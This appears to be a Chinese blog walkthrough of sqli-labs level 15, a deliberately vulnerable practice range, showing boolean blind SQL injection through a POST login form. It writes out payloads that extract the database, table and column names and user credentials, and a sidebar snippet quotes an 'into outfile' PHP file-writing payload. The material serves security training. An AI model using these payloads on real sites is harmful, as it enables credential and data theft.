sqli-labs less-15 post布尔注入

于 2024-10-07 17:08:41 发布
阅读量410 收藏 7
点赞数 14
分类专栏: sqli-labs靶场 文章标签: less oracle 前端 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanggonghanfei/article/details/142742633
版权

sqli-labs less-15 布尔注入

在这里插入图片描述
随意输入测试库,发现页面没有报错,只有显示登陆成功或者失败两种状态,考虑布尔盲注
构造

uname=aaa’ or 1=1 # &passwd=bbb&Submit=Submit

发现登录成功,确定闭合方式位',可以构造出 'or 1=1 #,然后将单引号换位其他符号来测试各种闭合方式,登陆成功即是闭合方式。
在这里插入图片描述

爆出数据库名长度

因为确定使用布尔盲注,所以使用下面语句来测试数据库名长度,

uname=aaa’ or 1=if((length(database())>8),1,2) # &passwd=bbb&Submit=Submit

发现大于登陆成功,大于8失败,可以确定数据库名长度8.

爆出数据库名

uname=aaa’ or 1=if((ascii(substr(database(),1,1))>100),1,2) # &passwd=bbb&Submit=Submit
uname=aaa’ or 1=if((ascii(substr(database(),1,1))>120),1,2) # &passwd=bbb&Submit=Submit
uname=aaa’ or 1=if((ascii(substr(database(),1,1))>110),1,2) # &passwd=bbb&Submit=Submit
uname=aaa’ or 1=if((ascii(substr(database(),1,1))>115),1,2) # &passwd=bbb&Submit=Submit
uname=aaa’ or 1=if((ascii(substr(database(),1,1))>114),1,2) # &passwd=bbb&Submit=Submit

通过页面回显最终确定数据库名手字母对应的ascii码位115,参照ASCII码表,位s.
在这里插入图片描述

爆出表名

  • uname=aaa’ or 1=if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>101),1,2) # &passwd=bbb&Submit=Submit

在这条语句经过多次尝试,确定大于100成功,101失败,确定表名的第一个字母为e。修改substr参数的值,得到所有表。

爆出列名

  • uname=aaa’ or 1=if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),1,1))>104),1,2) # &passwd=bbb&Submit=Submit

发现列名第一个字母的ASCII值为105,对照表为i.
修改substr参数值,得到所有列名

爆出数据

  • uname=aaa’ or 1=if((ascii(substr((select group_concat(username,‘~’,password) from security.users),1,1))>68),1,2) # &passwd=bbb&Submit=Submit

经过多次修改ascii大于的值,得到数据第一个字母的ASCII值为68 ,对照ASCII表的D,参照上面方法,得到所有的值,注意group_concat()中拼接的符号 也算值。
至此大功告成。

子非鱼999
关注
专栏目录
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1442
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 743
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 996
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
【Python】面向Sqli-Labs Less15布尔盲注二分法脚本
RexHa的博客
11-18 1801
python实现sqli-labs第15post盲注的二分法注入脚本(基于布尔盲注)
sqli-labs-less-15 post布尔盲注+sqlmap爆破
yzcn
11-12 893
Less-15 方法一: Post传参,先用burp suite抓包 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 显示登录成功,闭合方式为’’ uname=’) or 1=1 #&passwd=&submit=Submit 添加符号后没有报错信息,直接返回登录失败,说明这题只有正确或者错误两种返回,可以使用布尔盲注进行注入。 Substr(a,b,c):从位置b开始截取a字符中的前c个字符 判断当前数据库名长度: u
sqli-labs:less-15
羽的博客
08-29 185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 6300
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs通关笔记(less-11 ~ less16)
weixin_44533365的博客
01-22 576
上一篇文章说了sqli-labs的less-1到less-10的注入方法,这一篇从less-11开始。
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Proxyless的多活流量和微服务治理
最新发布
无休居士的博客
10-03 1178
Joylive Agent 是一个基于字节码增强的框架,专注于多活和单元化场景下的流量治理。它提供了以下功能:多活流量调度、全链路灰度发布、QPS和并发限制、标签路由、负载均衡,熔断降级,鉴权等流量治理策略。其特性包括微内核架构、强类隔离、业务零侵入等,使其在保持高性能的同时对业务代码影响最小,是面向Java领域的新一代Proxyless Service Mesh探索实现。项目地址:https://github.com/jd-opensource/joylive-agent。
滚雪球学MySQL[7.3讲]:数据库日志与审计详解:从错误日志到审计日志的配置与使用
**My Coding Family**
10-01 1692
在上一期中,我们深入探讨了数据库的安全策略,特别是如何通过权限管理、加密和用户认证来保护数据库免受未授权的访问。然而,尽管这些预防性措施非常重要,但仅靠安全策略并不能完全规避数据库运行中的潜在问题和安全隐患。要确保数据库的长期稳定、安全运行,日志与审计成为不可或缺的工具。通过对数据库活动进行记录和审查,管理员可以及时发现并解决系统中的故障和异常行为。本期文章将深入探讨日志与审计,具体涵盖日志的类型及配置(如错误日志、慢查询日志)以及审计日志的使用与配置。
SQL中基本SELECT语句及常见关键字的使用(内连接,左/右连接)
qq_43800449的博客
09-29 1030
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句关键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句关键字主要包括 insert 、 delete 、 update 等。
Oracle数据库物理结构操作管理
m0_74344909的博客
09-29 587
Oracle物理结构操作管理
滚雪球学Oracle[3.3讲]:数据定义语言(DDL)
**My Coding Family**
10-02 940
在上期内容中,我们深入探讨了查询与数据操作基础,重点讲解了如何使用SQL语言执行数据查询、插入、更新与删除操作。通过这些基础的SQL操作,大家了解了如何与数据库交互、修改数据,并为业务应用提供支持。这些操作属于数据操作语言(DML)的范畴,帮助我们掌握了数据库操作的基础知识。在本期,我们将更进一步,进入数据定义语言(DDL)的领域。DDL是用于定义和修改数据库结构的语言,它负责创建、修改和删除数据库对象。我们将从约束的高级使用(如主键、唯一性、外键等)入手,详细讨论DDL的核心功能。
Qt多线程与数据库
weixin_51883798的博客
09-29 410
那么可以用多线程,在子线程中查询数据,主线程可以弹出一个模态窗口进行提示,如“数据载入中”。如果希望在子线程中完成对数据库的查询操作,那么在子线程中重新添加一个新的连接名。之前上个项目用的方法是分页显示,数据库查询时加limit。但是我按这个思路走下去,程序会出现偶发的崩溃。这次情景不同,如果就必须要把数据都读出来。数据库的一张表里有10000条数据。一下子都读出来,页面会卡死。去找原因时,猜测应该是因为。
redo log 和 bin log 的两阶段提交
fujiang_xiao的博客
09-30 650
再根据 XID 去 bin log 中进行查找,如果 bin log 中不存在 XID,则说明 虽然 redo log 刷盘了,但是 bin log 没有刷盘,此时会进行事务回滚(根据 undo log 回滚)如果 bin log 存在 XID,则虽然 redo log 处于 prepare 状态,但 bin log 已经刷盘了,此时会对事务进行提交。会首先查看 redo log 的状态,如果 redo log 的状态为 commit,则说明事务的两阶段提交已经完成,可以放心进行数据恢复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值